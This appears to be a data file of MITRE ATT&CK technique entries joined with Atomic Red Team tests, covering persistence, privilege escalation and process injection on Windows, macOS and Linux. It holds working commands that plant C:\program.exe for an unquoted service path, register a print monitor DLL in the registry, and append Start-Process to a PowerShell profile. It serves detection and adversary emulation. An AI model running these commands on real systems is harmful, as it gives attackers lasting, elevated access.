marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Path Interception by Unquoted Path - description: |- - Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. 
Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch. - - Service paths (Citation: Microsoft CurrentControlSet Services) and shortcut paths may also be vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks (e.g., C:\unsafe path with space\program.exe vs. "C:\safe path with space\program.exe"). (Citation: Help eliminate unquoted path) (stored in Windows Registry keys) An adversary can place an executable in a higher level directory of the path, and Windows will resolve that executable instead of the intended executable. For example, if the path in a shortcut is C:\program files\myapp.exe, an adversary may create a program at C:\program.exe that will be run instead of the intended program. (Citation: Windows Unquoted Services) (Citation: Windows Privilege Escalation Guide) - - This technique can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process. - id: attack-pattern--bf96a5a3-3bce-43b7-8597-88545984c07b - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: defense-evasion - modified: '2020-09-17T19:05:23.755Z' - created: '2020-03-13T13:51:58.519Z' - x_mitre_version: '1.1' - x_mitre_is_subtechnique: true - x_mitre_detection: |- - Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. 
Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious. - - Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. - x_mitre_data_sources: - - Process monitoring - - File monitoring - x_mitre_contributors: - - Stefan Kanthak - x_mitre_platforms: - - Windows - identifier: T1574.009 - atomic_tests: - - name: Execution of program.exe as service with unquoted service path - auto_generated_guid: 2770dea7-c50f-457b-84c4-c40a47460d9f - description: | - When a service is created whose executable path contains spaces and isn’t enclosed within quotes, leads to a vulnerability - known as Unquoted Service Path which allows a user to gain SYSTEM privileges. - In this case, if an executable program.exe in C:\ exists, C:\program.exe will be executed instead of test.exe in C:\Program Files\subfolder\test.exe. 
- supported_platforms: - - windows - input_arguments: - service_executable: - description: Path of the executable used for the service and as the hijacked - program.exe - type: path - default: PathToAtomicsFolder\T1574.009\bin\WindowsServiceExample.exe - executor: - command: | - copy #{service_executable} "C:\Program Files\windows_service.exe" - copy #{service_executable} "C:\program.exe" - sc create "Example Service" binpath= "C:\Program Files\windows_service.exe" Displayname= "Example Service" start= auto - sc start "Example Service" - cleanup_command: | - sc stop "Example Service" >nul 2>&1 - sc delete "Example Service" >nul 2>&1 - del "C:\Program Files\windows_service.exe" >nul 2>&1 - del "C:\program.exe" >nul 2>&1 - del "C:\Time.log" >nul 2>&1 - name: command_prompt - elevation_required: true - T1547.011: - technique: - created: '2020-01-24T20:02:59.149Z' - modified: '2020-06-20T19:57:36.136Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - type: attack-pattern - id: attack-pattern--6747daa2-3533-4e78-8fb8-446ebb86448a - description: "Adversaries may modify plist files to run a program during system - boot or user login. Property list (plist) files contain all of the information - that macOS and OS X uses to configure applications and services. These files - are UTF-8 encoded and formatted like XML documents via a series of keys surrounded - by < >. They detail when programs should execute, file paths to the executables, - program arguments, required OS permissions, and many others. plists are located - in certain locations depending on their purpose such as /Library/Preferences - (which execute with elevated privileges) and ~/Library/Preferences - (which execute with a user's privileges). \n\nAdversaries can modify plist - files to execute their code as part of establishing persistence. 
plists may - also be used to elevate privileges since they may execute in the context of - another user.(Citation: Sofacy Komplex Trojan) \n\nA specific plist used for - execution at login is com.apple.loginitems.plist.(Citation: Methods - of Mac Malware Persistence) Applications under this plist run under the logged - in user's context, and will be started every time the user logs in. Login - items installed using the Service Management Framework are not visible in - the System Preferences and can only be removed by the application that created - them.(Citation: Adding Login Items) Users have direct control over login items - installed using a shared file list which are also visible in System Preferences - (Citation: Adding Login Items). Some of these applications can open visible - dialogs to the user, but they don’t all have to since there is an option to - \"hide\" the window. If an adversary can register their own login item or - modified an existing one, then they can use it to execute their code for a - persistence mechanism each time the user logs in (Citation: Malware Persistence - on OS X) (Citation: OSX.Dok Malware). The API method SMLoginItemSetEnabled - can be used to set Login Items, but scripting languages like [AppleScript](https://attack.mitre.org/techniques/T1059/002) - can do this as well. (Citation: Adding Login Items)" - name: Plist Modification - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1547.011 - url: https://attack.mitre.org/techniques/T1547/011 - - url: https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/ - description: Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26). - Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017. 
- source_name: Sofacy Komplex Trojan - - url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf - description: Patrick Wardle. (2014, September). Methods of Malware Persistence - on Mac OS X. Retrieved July 5, 2017. - source_name: Methods of Mac Malware Persistence - - url: https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLoginItems.html - description: Apple. (2016, September 13). Adding Login Items. Retrieved July - 11, 2017. - source_name: Adding Login Items - - url: https://www.rsaconference.com/writable/presentations/file_upload/ht-r03-malware-persistence-on-os-x-yosemite_final.pdf - description: Patrick Wardle. (2015). Malware Persistence on OS X Yosemite. - Retrieved July 10, 2017. - source_name: Malware Persistence on OS X - - url: https://blog.malwarebytes.com/threat-analysis/2017/04/new-osx-dok-malware-intercepts-web-traffic/ - description: Thomas Reed. (2017, July 7). New OSX.Dok malware intercepts web - traffic. Retrieved July 10, 2017. - source_name: OSX.Dok Malware - x_mitre_platforms: - - macOS - x_mitre_data_sources: - - File monitoring - - Process monitoring - - Process command-line parameters - x_mitre_detection: |- - File system monitoring can determine if plist files are being modified. Users should not have permission to modify these in most cases. Some software tools like "Knock Knock" can detect persistence mechanisms and point to the specific files that are being referenced. This can be helpful to see what is actually being executed. - - All the login items created via shared file lists are viewable by going to the Apple menu -> System Preferences -> Users & Groups -> Login items. This area (and the corresponding file locations) should be monitored and allowed for known good applications. 
Otherwise, Login Items are located in Contents/Library/LoginItems within an application bundle, so these paths should be monitored as well.(Citation: Adding Login Items) - - Monitor process execution for abnormal process execution resulting from modified plist files. Monitor utilities used to modify plist files or that take a plist file as an argument, which may indicate suspicious activity. - x_mitre_permissions_required: - - User - - Administrator - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' - identifier: T1547.011 - atomic_tests: - - name: Plist Modification - auto_generated_guid: 394a538e-09bb-4a4a-95d1-b93cf12682a8 - description: 'Modify MacOS plist file in one of two directories - -' - supported_platforms: - - macos - executor: - steps: | - 1. Modify a .plist in - - /Library/Preferences - - OR - - ~/Library/Preferences - - 2. Subsequently, follow the steps for adding and running via [Launch Agent](Persistence/Launch_Agent.md) - name: manual - T1547.010: - technique: - external_references: - - source_name: mitre-attack - external_id: T1547.010 - url: https://attack.mitre.org/techniques/T1547/010 - - url: http://msdn.microsoft.com/en-us/library/dd183341 - description: Microsoft. (n.d.). AddMonitor function. Retrieved November 12, - 2014. - source_name: AddMonitor - - url: https://www.defcon.org/images/defcon-22/dc-22-presentations/Bloxham/DEFCON-22-Brady-Bloxham-Windows-API-Abuse-UPDATED.pdf - description: Bloxham, B. (n.d.). Getting Windows to Play with Itself [PowerPoint - slides]. Retrieved November 12, 2014. - source_name: Bloxham - - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 - description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. - Retrieved June 6, 2016. 
- source_name: TechNet Autoruns - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Port Monitors - description: "Adversaries may use port monitors to run an attacker supplied - DLL during system boot for persistence or privilege escalation. A port monitor - can be set through the AddMonitor API call to set a DLL to be - loaded at startup. (Citation: AddMonitor) This DLL can be located in C:\\Windows\\System32 - and will be loaded by the print spooler service, spoolsv.exe, on boot. The - spoolsv.exe process also runs under SYSTEM level permissions. (Citation: Bloxham) - Alternatively, an arbitrary DLL can be loaded if permissions allow writing - a fully-qualified pathname for that DLL to HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors. - \n\nThe Registry key contains entries for the following:\n\n* Local Port\n* - Standard TCP/IP Port\n* USB Monitor\n* WSD Port\n\nAdversaries can use this - technique to load malicious code at startup that will persist on system reboot - and execute as SYSTEM." - id: attack-pattern--43881e51-ac74-445b-b4c6-f9f9e9bf23fe - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-01-24T19:46:27.750Z' - created: '2020-01-24T19:46:27.750Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_effective_permissions: - - SYSTEM - x_mitre_permissions_required: - - SYSTEM - - Administrator - x_mitre_detection: "Monitor process API calls to AddMonitor.(Citation: - AddMonitor) Monitor DLLs that are loaded by spoolsv.exe for DLLs that are - abnormal. New DLLs written to the System32 directory that do not correlate - with known good software or patching may be suspicious. \n\nMonitor Registry - writes to HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors. 
- Run the Autoruns utility, which checks for this Registry key as a persistence - mechanism (Citation: TechNet Autoruns)" - x_mitre_data_sources: - - File monitoring - - API monitoring - - DLL monitoring - - Windows Registry - - Process monitoring - x_mitre_contributors: - - Stefan Kanthak - - Travis Smith, Tripwire - x_mitre_platforms: - - Windows - identifier: T1547.010 - atomic_tests: - - name: Add Port Monitor persistence in Registry - auto_generated_guid: d34ef297-f178-4462-871e-9ce618d44e50 - description: Add key-value pair to a Windows Port Monitor registry. On the subsequent - reboot dll will be execute under spoolsv with NT AUTHORITY/SYSTEM privilege. - supported_platforms: - - windows - input_arguments: - monitor_dll: - description: Addition to port monitor registry key. Normally refers to a - DLL name in C:\Windows\System32. arbitrary DLL can be loaded if permissions - allow writing a fully-qualified pathname for that DLL. - type: Path - default: C:\Path\AtomicRedTeam.dll - executor: - command: 'reg add "hklm\system\currentcontrolset\control\print\monitors\ART" - /v "Atomic Red Team" /d "#{monitor_dll}" /t REG_SZ - -' - cleanup_command: 'reg delete "hklm\system\currentcontrolset\control\print\monitors\ART" - -' - name: command_prompt - elevation_required: true - T1055.002: - technique: - external_references: - - source_name: mitre-attack - external_id: T1055.002 - url: https://attack.mitre.org/techniques/T1055/002 - - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process - description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: - A Technical Survey Of Common And Trending Process Injection Techniques. - Retrieved December 7, 2017.' 
- source_name: Endgame Process Injection July 2017 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Portable Executable Injection - description: "Adversaries may inject portable executables (PE) into processes - in order to evade process-based defenses as well as possibly elevate privileges. - PE injection is a method of executing arbitrary code in the address space - of a separate live process. \n\nPE injection is commonly performed by copying - code (perhaps without a file on disk) into the virtual address space of the - target process before invoking it via a new thread. The write can be performed - with native Windows API calls such as VirtualAllocEx and WriteProcessMemory, - then invoked with CreateRemoteThread or additional code (ex: - shellcode). The displacement of the injected code does introduce the additional - requirement for functionality to remap memory references. (Citation: Endgame - Process Injection July 2017) \n\nRunning code in the context of another process - may allow access to the process's memory, system/network resources, and possibly - elevated privileges. Execution via PE injection may also evade detection from - security products since the execution is masked under a legitimate process. 
" - id: attack-pattern--806a49c4-970d-43f9-9acc-ac0ee11e6662 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-06-20T22:19:58.813Z' - created: '2020-01-14T01:27:31.344Z' - x_mitre_defense_bypassed: - - Anti-virus - - Application control - x_mitre_data_sources: - - Process monitoring - - API monitoring - x_mitre_permissions_required: - - User - x_mitre_detection: "Monitoring Windows API calls indicative of the various types - of code injection may generate a significant amount of data and may not be - directly useful for defense unless collected under specific circumstances - for known bad sequences of calls, since benign use of API functions may be - common and difficult to distinguish from malicious behavior. Windows API calls - such as CreateRemoteThread and those that can be used to modify - memory within another process, such as VirtualAllocEx/WriteProcessMemory, - may be used for this technique.(Citation: Endgame Process Injection July 2017)\n\nAnalyze - process behavior to determine if a process is performing actions it usually - does not, such as opening network connections, reading files, or other suspicious - actions that could relate to post-compromise behavior. " - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_platforms: - - Windows - atomic_tests: [] - T1546.013: - technique: - external_references: - - source_name: mitre-attack - external_id: T1546.013 - url: https://attack.mitre.org/techniques/T1546/013 - - source_name: Microsoft About Profiles - url: https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_profiles?view=powershell-6 - description: Microsoft. (2017, November 29). About Profiles. Retrieved June - 14, 2019. 
- - source_name: ESET Turla PowerShell May 2019 - url: https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/ - description: Faou, M. and Dumont R.. (2019, May 29). A dive into Turla PowerShell - usage. Retrieved June 14, 2019. - - source_name: Wits End and Shady PowerShell Profiles - url: https://witsendandshady.blogspot.com/2019/06/lab-notes-persistence-and-privilege.html - description: 'DeRyke, A.. (2019, June 7). Lab Notes: Persistence and Privilege - Elevation using the Powershell Profile. Retrieved July 8, 2019.' - - url: http://www.malwarearchaeology.com/s/Windows-PowerShell-Logging-Cheat-Sheet-ver-June-2016-v2.pdf - description: Malware Archaeology. (2016, June). WINDOWS POWERSHELL LOGGING - CHEAT SHEET - Win 7/Win 2008 or later. Retrieved June 24, 2016. - source_name: Malware Archaeology PowerShell Cheat Sheet - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: PowerShell Profile - description: "Adversaries may gain persistence and elevate privileges by executing - malicious content triggered by PowerShell profiles. A PowerShell profile (profile.ps1) - is a script that runs when [PowerShell](https://attack.mitre.org/techniques/T1059/001) - starts and can be used as a logon script to customize user environments.\n\n[PowerShell](https://attack.mitre.org/techniques/T1059/001) - supports several profiles depending on the user or host program. For example, - there can be different profiles for [PowerShell](https://attack.mitre.org/techniques/T1059/001) - host programs such as the PowerShell console, PowerShell ISE or Visual Studio - Code. An administrator can also configure a profile that applies to all users - and host programs on the local computer. 
(Citation: Microsoft About Profiles) - \n\nAdversaries may modify these profiles to include arbitrary commands, functions, - modules, and/or [PowerShell](https://attack.mitre.org/techniques/T1059/001) - drives to gain persistence. Every time a user opens a [PowerShell](https://attack.mitre.org/techniques/T1059/001) - session the modified script will be executed unless the -NoProfile - flag is used when it is launched. (Citation: ESET Turla PowerShell May 2019) - \n\nAn adversary may also be able to escalate privileges if a script in a - PowerShell profile is loaded and executed by an account with higher privileges, - such as a domain administrator. (Citation: Wits End and Shady PowerShell Profiles)" - id: attack-pattern--0f2c410d-d740-4ed9-abb1-b8f4a7faf6c3 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-03-24T21:31:31.082Z' - created: '2020-01-24T15:11:02.758Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - User - - Administrator - x_mitre_detection: |- - Locations where profile.ps1 can be stored should be monitored for new profiles or modifications. (Citation: Malware Archaeology PowerShell Cheat Sheet) Example profile locations include: - - * $PsHome\Profile.ps1 - * $PsHome\Microsoft.{HostProgram}_profile.ps1 - * $Home\My Documents\PowerShell\Profile.ps1 - * $Home\My Documents\PowerShell\Microsoft.{HostProgram}_profile.ps1 - - Monitor abnormal PowerShell commands, unusual loading of PowerShell drives or modules, and/or execution of unknown programs. 
- x_mitre_data_sources: - - PowerShell logs - - File monitoring - - Process command-line parameters - - Process monitoring - x_mitre_contributors: - - Allen DeRyke, ICE - x_mitre_platforms: - - Windows - identifier: T1546.013 - atomic_tests: - - name: Append malicious start-process cmdlet - auto_generated_guid: '090e5aa5-32b6-473b-a49b-21e843a56896' - description: 'Appends a start process cmdlet to the current user''s powershell - profile pofile that points to a malicious executable. Upon execution, calc.exe - will be launched. - -' - supported_platforms: - - windows - input_arguments: - exe_path: - description: Path the malicious executable - type: Path - default: calc.exe - ps_profile: - description: Powershell profile to use - type: String - default: "$profile" - dependency_executor_name: powershell - dependencies: - - description: 'Ensure a powershell profile exists for the current user - -' - prereq_command: 'if (Test-Path #{ps_profile}) {exit 0} else {exit 1} - -' - get_prereq_command: 'New-Item -Path #{ps_profile} -Type File -Force - -' - executor: - command: | - Add-Content #{ps_profile} -Value "" - Add-Content #{ps_profile} -Value "Start-Process #{exe_path}" - powershell -Command exit - cleanup_command: | - $oldprofile = cat $profile | Select-Object -skiplast 1 - Set-Content $profile -Value $oldprofile - name: powershell - T1547.012: - technique: - external_references: - - source_name: mitre-attack - external_id: T1547.012 - url: https://attack.mitre.org/techniques/T1547/012 - - source_name: Microsoft AddPrintProcessor May 2018 - url: https://docs.microsoft.com/en-us/windows/win32/printdocs/addprintprocessor - description: Microsoft. (2018, May 31). AddPrintProcessor function. Retrieved - October 5, 2020. - - source_name: ESET PipeMon May 2020 - url: https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/ - description: Tartare, M. et al. (2020, May 21). No “Game over” for the Winnti - Group. Retrieved August 24, 2020. 
- object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Print Processors - description: "Adversaries may abuse print processors to run malicious DLLs during - system boot for persistence and/or privilege escalation. Print processors - are DLLs that are loaded by the print spooler service, spoolsv.exe, during - boot. \n\nAdversaries may abuse the print spooler service by adding print - processors that load malicious DLLs at startup. A print processor can be installed - through the AddPrintProcessor API call with an account that has - SeLoadDriverPrivilege enabled. Alternatively, a print processor - can be registered to the print spooler service by adding the HKLM\\SYSTEM\\\\[CurrentControlSet - or ControlSet001]\\Control\\Print\\Environments\\\\[Windows architecture: - e.g., Windows x64]\\Print Processors\\\\[user defined]\\Driver Registry - key that points to the DLL. For the print processor to be correctly installed, - it must be located in the system print-processor directory that can be found - with the GetPrintProcessorDirectory API call.(Citation: Microsoft - AddPrintProcessor May 2018) After the print processors are installed, the - print spooler service, which starts during boot, must be restarted in order - for them to run.(Citation: ESET PipeMon May 2020) The print spooler service - runs under SYSTEM level permissions, therefore print processors installed - by an adversary may run under elevated privileges." 
- id: attack-pattern--2de47683-f398-448f-b947-9abcc3e32fad - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-10-09T16:05:36.344Z' - created: '2020-10-05T13:24:49.780Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - Administrator - - SYSTEM - x_mitre_detection: |- - Monitor process API calls to AddPrintProcessor and GetPrintProcessorDirectory. New print processor DLLs are written to the print processor directory. Also monitor Registry writes to HKLM\SYSTEM\ControlSet001\Control\Print\Environments\\[Windows architecture]\Print Processors\\[user defined]\\Driver or HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\\[Windows architecture]\Print Processors\\[user defined]\Driver as they pertain to print processor installations. - - Monitor for abnormal DLLs that are loaded by spoolsv.exe. Print processors that do not correlate with known good software or patching may be suspicious. - x_mitre_data_sources: - - Process monitoring - - Windows Registry - - File monitoring - - DLL monitoring - - API monitoring - x_mitre_contributors: - - Mathieu Tartare, ESET - x_mitre_platforms: - - Windows - atomic_tests: [] - T1055.009: - technique: - external_references: - - source_name: mitre-attack - external_id: T1055.009 - url: https://attack.mitre.org/techniques/T1055/009 - - url: http://hick.org/code/skape/papers/needle.txt - description: skape. (2003, January 19). Linux x86 run-time process manipulation. - Retrieved December 20, 2017. - source_name: Uninformed Needle - - source_name: GDS Linux Injection - url: https://blog.gdssecurity.com/labs/2017/9/5/linux-based-inter-process-code-injection-without-ptrace2.html - description: McNamara, R. (2017, September 5). Linux Based Inter-Process Code - Injection Without Ptrace(2). Retrieved February 21, 2020. 
- - source_name: DD Man - url: http://man7.org/linux/man-pages/man1/dd.1.html - description: Kerrisk, M. (2020, February 2). DD(1) User Commands. Retrieved - February 21, 2020. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Proc Memory - description: "Adversaries may inject malicious code into processes via the /proc - filesystem in order to evade process-based defenses as well as possibly elevate - privileges. Proc memory injection is a method of executing arbitrary code - in the address space of a separate live process. \n\nProc memory injection - involves enumerating the memory of a process via the /proc filesystem (/proc/[pid]) - then crafting a return-oriented programming (ROP) payload with available gadgets/instructions. - Each running process has its own directory, which includes memory mappings. - Proc memory injection is commonly performed by overwriting the target processes’ - stack using memory mappings provided by the /proc filesystem. This information - can be used to enumerate offsets (including the stack) and gadgets (or instructions - within the program that can be used to build a malicious payload) otherwise - hidden by process memory protections such as address space layout randomization - (ASLR). Once enumerated, the target processes’ memory map within /proc/[pid]/maps - can be overwritten using dd.(Citation: Uninformed Needle)(Citation: GDS Linux - Injection)(Citation: DD Man) \n\nOther techniques such as [LD_PRELOAD](https://attack.mitre.org/techniques/T1574/006) - may be used to populate a target process with more available gadgets. 
Similar - to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012), proc - memory injection may target child processes (such as a backgrounded copy of - sleep).(Citation: GDS Linux Injection) \n\nRunning code in the context of - another process may allow access to the process's memory, system/network resources, - and possibly elevated privileges. Execution via proc memory injection may - also evade detection from security products since the execution is masked - under a legitimate process. " - id: attack-pattern--d201d4cc-214d-4a74-a1ba-b3fa09fd4591 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-06-20T22:25:55.331Z' - created: '2020-01-14T01:34:10.588Z' - x_mitre_defense_bypassed: - - Application control - - Anti-virus - x_mitre_data_sources: - - Process monitoring - - File monitoring - x_mitre_detection: "File system monitoring can determine if /proc files are - being modified. Users should not have permission to modify these in most cases. - \n\nAnalyze process behavior to determine if a process is performing actions - it usually does not, such as opening network connections, reading files, or - other suspicious actions that could relate to post-compromise behavior. " - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_platforms: - - Linux - atomic_tests: [] - T1055.013: - technique: - external_references: - - source_name: mitre-attack - external_id: T1055.013 - url: https://attack.mitre.org/techniques/T1055/013 - - url: https://msdn.microsoft.com/library/windows/desktop/bb968806.aspx - description: Microsoft. (n.d.). Transactional NTFS (TxF). Retrieved December - 20, 2017. - source_name: Microsoft TxF - - url: https://msdn.microsoft.com/library/windows/desktop/dd979526.aspx - description: Microsoft. (n.d.). Basic TxF Concepts. Retrieved December 20, - 2017. 
- source_name: Microsoft Basic TxF Concepts - - url: https://msdn.microsoft.com/library/windows/desktop/aa365738.aspx - description: Microsoft. (n.d.). When to Use Transactional NTFS. Retrieved - December 20, 2017. - source_name: Microsoft Where to use TxF - - url: https://www.blackhat.com/docs/eu-17/materials/eu-17-Liberman-Lost-In-Transaction-Process-Doppelganging.pdf - description: 'Liberman, T. & Kogan, E. (2017, December 7). Lost in Transaction: - Process Doppelgänging. Retrieved December 20, 2017.' - source_name: BlackHat Process Doppelgänging Dec 2017 - - url: https://hshrzd.wordpress.com/2017/12/18/process-doppelganging-a-new-way-to-impersonate-a-process/ - description: hasherezade. (2017, December 18). Process Doppelgänging – a new - way to impersonate a process. Retrieved December 20, 2017. - source_name: hasherezade Process Doppelgänging Dec 2017 - - url: https://msdn.microsoft.com/library/windows/hardware/ff559951.aspx - description: Microsoft. (n.d.). PsSetCreateProcessNotifyRoutine routine. Retrieved - December 20, 2017. - source_name: Microsoft PsSetCreateProcessNotifyRoutine routine - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Process Doppelgänging - description: "Adversaries may inject malicious code into process via process - doppelgänging in order to evade process-based defenses as well as possibly - elevate privileges. Process doppelgänging is a method of executing arbitrary - code in the address space of a separate live process. \n\nWindows Transactional - NTFS (TxF) was introduced in Vista as a method to perform safe file operations. - (Citation: Microsoft TxF) To ensure data integrity, TxF enables only one transacted - handle to write to a file at a given time. 
Until the write handle transaction - is terminated, all other handles are isolated from the writer and may only - read the committed version of the file that existed at the time the handle - was opened. (Citation: Microsoft Basic TxF Concepts) To avoid corruption, - TxF performs an automatic rollback if the system or application fails during - a write transaction. (Citation: Microsoft Where to use TxF)\n\nAlthough deprecated, - the TxF application programming interface (API) is still enabled as of Windows - 10. (Citation: BlackHat Process Doppelgänging Dec 2017)\n\nAdversaries may - abuse TxF to a perform a file-less variation of [Process Injection](https://attack.mitre.org/techniques/T1055). - Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1093), - process doppelgänging involves replacing the memory of a legitimate process, - enabling the veiled execution of malicious code that may evade defenses and - detection. Process doppelgänging's use of TxF also avoids the use of highly-monitored - API functions such as NtUnmapViewOfSection, VirtualProtectEx, - and SetThreadContext. (Citation: BlackHat Process Doppelgänging - Dec 2017)\n\nProcess Doppelgänging is implemented in 4 steps (Citation: BlackHat - Process Doppelgänging Dec 2017):\n\n* Transact – Create a TxF transaction - using a legitimate executable then overwrite the file with malicious code. - These changes will be isolated and only visible within the context of the - transaction.\n* Load – Create a shared section of memory and load the malicious - executable.\n* Rollback – Undo changes to original executable, effectively - removing malicious code from the file system.\n* Animate – Create a process - from the tainted section of memory and initiate execution.\n\nThis behavior - will likely not result in elevated privileges since the injected process was - spawned from (and thus inherits the security context) of the injecting process. 
- However, execution via process doppelgänging may evade detection from security - products since the execution is masked under a legitimate process. " - id: attack-pattern--7007935a-a8a7-4c0b-bd98-4e85be8ed197 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-06-20T22:27:21.304Z' - created: '2020-01-14T17:19:50.978Z' - x_mitre_defense_bypassed: - - Anti-virus - - Application control - x_mitre_data_sources: - - File monitoring - - Process monitoring - - API monitoring - x_mitre_permissions_required: - - Administrator - - SYSTEM - - User - x_mitre_detection: |- - Monitor and analyze calls to CreateTransaction, CreateFileTransacted, RollbackTransaction, and other rarely used functions indicative of TxF activity. Process Doppelgänging also invokes an outdated and undocumented implementation of the Windows process loader via calls to NtCreateProcessEx and NtCreateThreadEx as well as API calls used to modify memory within another process, such as WriteProcessMemory. (Citation: BlackHat Process Doppelgänging Dec 2017) (Citation: hasherezade Process Doppelgänging Dec 2017) - - Scan file objects reported during the PsSetCreateProcessNotifyRoutine, (Citation: Microsoft PsSetCreateProcessNotifyRoutine routine) which triggers a callback whenever a process is created or deleted, specifically looking for file objects with enabled write access. (Citation: BlackHat Process Doppelgänging Dec 2017) Also consider comparing file objects loaded in memory to the corresponding file on disk. (Citation: hasherezade Process Doppelgänging Dec 2017) - - Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. 
- x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_platforms: - - Windows - atomic_tests: [] - T1055.012: - technique: - external_references: - - source_name: mitre-attack - external_id: T1055.012 - url: https://attack.mitre.org/techniques/T1055/012 - - url: http://www.autosectools.com/process-hollowing.pdf - description: Leitch, J. (n.d.). Process Hollowing. Retrieved November 12, - 2014. - source_name: Leitch Hollowing - - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process - description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: - A Technical Survey Of Common And Trending Process Injection Techniques. - Retrieved December 7, 2017.' - source_name: Endgame Process Injection July 2017 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Process Hollowing - description: "Adversaries may inject malicious code into suspended and hollowed - processes in order to evade process-based defenses. Process hollowing is a - method of executing arbitrary code in the address space of a separate live - process. \n\nProcess hollowing is commonly performed by creating a process - in a suspended state then unmapping/hollowing its memory, which can then be - replaced with malicious code. A victim process can be created with native - Windows API calls such as CreateProcess, which includes a flag - to suspend the processes primary thread. 
